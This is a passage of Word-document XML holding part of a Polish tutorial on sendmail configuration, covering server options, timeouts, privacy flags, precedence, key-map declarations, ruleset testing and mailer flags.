          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">  Wysylaj komunikaty o bledach w formacie MIM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Jsciezk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ciezka, w ktorej beda wyszukiwane pliki z adresami, do ktor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forwardowac poczte userow - domyslnie $z/.forward</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kN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Maksymalna ilosc cacheowanych polaczen - domyslnie=1</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KTimeou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Timeout dla cacheowanego polaczenia - domyslnie=5</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l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">  Wysylaj bledy pod adresy z linii "Errors-To:" (normalnie do nadawcy)</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Ln</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Poziom log'a - domyslnie 9</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m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">  Wyslij do mnie tez, nawet jesli jestem w rozszerzeniu aliasowy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Mxv</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Ustawia mailer x na wartosc v</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n </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>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o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">  support do starszej poczty (nie tylko przecinki oddzielaja nazw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Oopcj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Ustaw opcje serwera SMTP. Opcje podaje sie w formacie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>klucz=wartosc</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Klucze t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Port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">   Nazwa/numer portu, ktorego sluchamy - domyslnie=SMT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Addr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">   Maska adres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Family</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Rodzina adresow - domyslnie=INE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Listen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Wielkosc przyjmowanej kolejki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popcja, opcja, ...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Prywatnosc naszego mailera. Dostepne opcje t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public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">        Dostep otwart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eedmailhelo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">  Chce komendy HELO (komenda (jak i inne) z zestawu </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">  SMT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eedexpnhelo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">  Chce komende HELO przed komenda EXPN</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expn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">        Nie pozwala na EXPN</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eedvrfyhelo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">  Chce komende HELO przed komenda VERF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restrictmailq</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Zastrzega komende mailq</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restrictqrun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">  Zastrzega wywolanie z opcja -q</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noreceipts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">    Ignoruj naglowek "Return-Receipt-T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goaway</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">        Wylacz wszystkie zapytania o status SMT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authwarnings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">  Dodaje linie "X-Authentition-Warning:" do listo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Flaga </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>goaway</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> ustawia wszystkie flagi poza restrictmailq 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restrictqrun.</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Ppostmaste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Wysyla bledy do postmastera, zdefiniowanego przez wartosc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postmast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qwartos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Oblicza, kiedy tylko kolejkowac poczte, a kiedy dzialac - domysln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60000</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Qkatalog</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Podaje katalog z kolejk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rtimeou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Ustawia rozne timeouty wedlug klucza "klucz=timeout". Dostepne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klucze t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initial</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">   Czas do rozpoczecia sesji - domyslnie=5m (przy okazji: </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">    przy podawaniu wartosci czasowych, na koncu liczby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podajemy jednostki, ktorymi sa s=second, m=minute, </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">    h=hou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helo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">      Odpowiedz na HELO - domyslnie=5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mail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">      Odpowiedz na MAIL - domyslnie=10m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rcpt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">      Odpowiedz na RCPT - domyslnie=1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datainit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">  Odpowiedz na DATA - domyslnie=5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datablock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Czytanie bloku danych - domyslnie=1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datafinal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Odpowiedz na ostateczna '.' w danych - domyslnie=1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rset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">      Odpowiedz na RSET - domyslnie=5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quit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">      Odpowiedz na QUIT - domyslnie=5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misc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">      Odpowiedz na NOOP i VERB - domyslnie=2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command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">   Odczyt komendy - domyslnie=1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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>ident</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">     Timeout protokolu IDENT - domyslnie=30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Wszystkie timeouty oprocz "command" dotycza serwera SMTP.</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R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">  Polepsza routing przy wysylaniu bledow</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s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">  Nadzwyczajne srodki bezpieczenstwa przy prac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Spli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Plik, do ktorego pojdzie log</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xml:space="preserve">ttzinfo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Informacja o time-zone. Praktycznie zawsze uzywa sie zmiennej</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rodowiskowej TX=...</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Trtime/wtim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Ustawia warning-time i return-time listu niedostarczonego na czas.</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un</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ustawia userid mailera na n - domyslnie=1</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Uudbspe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pecyfikuje baze danych userow (user databas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v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">  Do uzytku raczej z command-line przy wywolywaniu sendmaila - ustawia c i d - cala poczta dostarczana jest w pojedynczym zadaniu, w taki sposob, abys mogl to obejrzec. Krotko mowiac - tryb "verbose"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Vfallbackhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>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w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">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xLA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Czekaj, az skolejkuje sie LA listow, by je (chyba?) wyslac.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domyslnie=8.</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XLA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Odmow nadchodzacych polaczen SMTP, gdy LA&gt;podanej wartosc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Domyslnie=12.</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yWspolczynnik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Zwiazane z priorytetowaniem poczty - domyslnie 30000.</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V</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">  Wykonuj kazda prace na kolejce w osobnym procesie. Przydatne, gdy ma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ie malo RAM'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zWspolczynnik</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Zwiazane z priorytetowaniem poczty - domyslnie 1800</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ZWspolczynnik</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Zwiazane z priorytetowaniem poczty - domyslnie 90000</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7 Obetnij wejscie do 7 bito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efinicje pierwszenstw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sli w naglowku jest zdefiniowana linijka "Precedence:", to mozn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korzystac z mechanizmu pierwszenstwa. Pierwszenstwo definiujemy ta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Pnazwa=numer</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Gdzie nazwa to wartosc linijki "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Precedence:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>", a numer to wartos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ierwszenstwa, jaka nadajemy temu listowi. Im wyzsza wartosc, tym list ma wieksze pierwszenstwo. Wartosci ujemne maja ta specjalna "umiejetnosc", ze jesli wystapi blad, ciala listow nie sa zwracane. Wartosci ujemne sa uzywane np. w listach dyskusyjnyc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Poziom kompatybilnosci:</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ozna definiowac kompatybilnosc z okreslonym rodzajem plik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omfiguracyjnego. Robi sie to ta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Vpozio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ie bedziemy sie tym glebiej zajmowac.</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eklarowanie pliku z klucze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ozna definiowac pliki, ktore umozliwiaja mapowanie okreslonych nazw n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nne. Definiowanie odbywa sie w nastepujacy sposob:</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Knazwamapy klasamapy arument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gdzie nazwamapy to nazwa, ktora jest uzywana do zidentyfikowania mapy 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regulach rulesetow, klasamapy okresla typ mapy, argumenty sa interpretowane roznie, zaleznie od mapy, zwykle okresla sie tam jedynie nazwe pliku z map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ap uzywa sie w sposob nastepujac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mapa klucz $@arg $:wartosc_domyslna $)</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gdzie mapa to nazwa mapy, z ktorej korzystamy, klucz to wartosc, ktor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hcemy zmienic za pomoca mapy, arg to argumenty (ktore opisze dalej), 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artosc_domyslna, to wartosc zwracana, gdy mapowanie sie nie powiedzie. Oto opis argumento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o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mapa jest opcjonalna, gdy nie zostanie znaleziona, nie ma bled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N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bajt NULL na koncu stringu jest dodawany do klucz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O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nigdy nie porownuj NULL'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x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dodaj tekst x na koniec mapowan. (np. mapa 'host' dodaje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f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nie zmniejszaj duzych liter przed sprawdzeniem klucz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m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nie podmieniaj wartosci, gdy istnieje map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liki z mapami tworzy sie z pomoca polecenia "makemap" z command-li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stnieja w sendmailu predefiniowane mapy standardowe. Oto o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host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - podaje kanoniczna nazwe host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dequote</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - pozbawia nazwe cytato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Testowanie rulesetow:</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sli zrobimy cos z plikiem konfiguracyjnym, to milo jest czase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rzetestowac jak dziala. Rulesety mozna bardzo latwo testowac polecenie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sendmail -bt -Cplik_konfiguracyjn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tore uruchamia sendmaila w trybie testowym, z okreslonym plikie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konfiguracyjny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Jeszcze o definiowaniu mailerow:</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eraz troche o definiowaniu mailerow w praktyce. Bedzie glownie mowa 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flagach. Powinna sie znalezc zawsze flaga f, ktora poda mailerowi nazwe nadawcy jako flage </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> lub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>-r</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Jesli mailer musi byc wywolywany z poziomu root'a, powinna byc ustawiona flaga </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">. Jesli mailer dostarcza poczte lokalnie, to powinien miec flage </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>l</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Jesli mailer podczas jednej akcji dostarcza poczte wielu userom, powinien miec flage </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> (wtedy bedzie podmieniac </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>$u</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stnieje rowniez ciekawa flaga "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>", ktora podmienia wszelkie adresy bez</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omeny na domene nadawcy, czyli n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rom: xyz@abc.co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o: zyx@xyz.com, qw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mieni n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From: xyz@abc.co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ab/>
        <w:t>To: zyx@xyz.com, qwe@abc.com</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ola </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> definicji mailera okreslaja, jakie rulesety wykonac, jesl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korzystamy z danego mailera. Rulesety te sa wykonywane przed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
